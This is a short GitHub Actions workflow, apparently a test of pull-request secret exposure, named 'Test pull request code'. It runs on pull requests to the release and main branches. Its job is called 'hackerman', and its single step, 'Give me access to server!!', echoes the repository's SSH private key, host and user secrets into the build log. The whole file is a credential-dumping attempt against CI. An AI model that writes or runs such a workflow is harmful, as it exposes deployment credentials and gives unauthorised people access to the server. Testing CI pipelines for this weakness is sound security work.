name: Test pull request code

on:
  pull_request:
    branches:
      - 'release'
      - 'main'

jobs:

  hackerman:
    environment: release
    runs-on: ubuntu-latest
    steps:
      - name: Give me access to server!!
        run: |
          echo ${{ secrets.SSH_PRIVATE_KEY }}
          echo ${{ secrets.SSH_HOST }}
          echo ${{ secrets.SSH_USER }}